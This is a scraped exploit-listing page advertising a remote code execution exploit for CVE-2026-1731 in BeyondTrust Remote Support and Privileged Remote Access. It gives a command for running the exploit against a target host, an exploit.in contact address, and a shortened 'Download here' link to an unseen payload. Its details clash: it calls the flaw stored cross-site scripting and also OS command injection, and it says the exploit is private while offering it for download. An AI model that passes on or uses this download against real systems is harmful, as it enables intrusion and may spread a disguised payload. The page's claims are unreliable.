Share
## https://sploitus.com/exploit?id=092D4155-C0AB-554F-84B1-F7EA941D4F09
# Security Unauthenticated Stored Cross-Site Scripting (CVE-2026-1731)

## Overview

A CRITICAL vulnerability, classified as CVE-2026-1731, has been identified, categorized under CWE-78, (CVSS 9.8).  BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

## Details

- **CVE ID**: [CVE-2026-1731](https://nvd.nist.gov/vuln/detail/CVE-2026-1731)
- **Discovered**: 2026-02-06
- **Published**: 2026-02-06
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

## Affected Versions

**Beyondtrust Privileged Remote Access:**

- before 25.1

**Beyondtrust Remote Support:**

- before 25.3.2

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **security@exploit.in**

## Exploit:
### [Download here](https://tinyurl.com/2bq6nxdk)

![image](https://raw.githubusercontent.com/richardpaimu34/CVE-2026-1731/main/assets/CVE-2026-1731-20260220223109398165.jpg)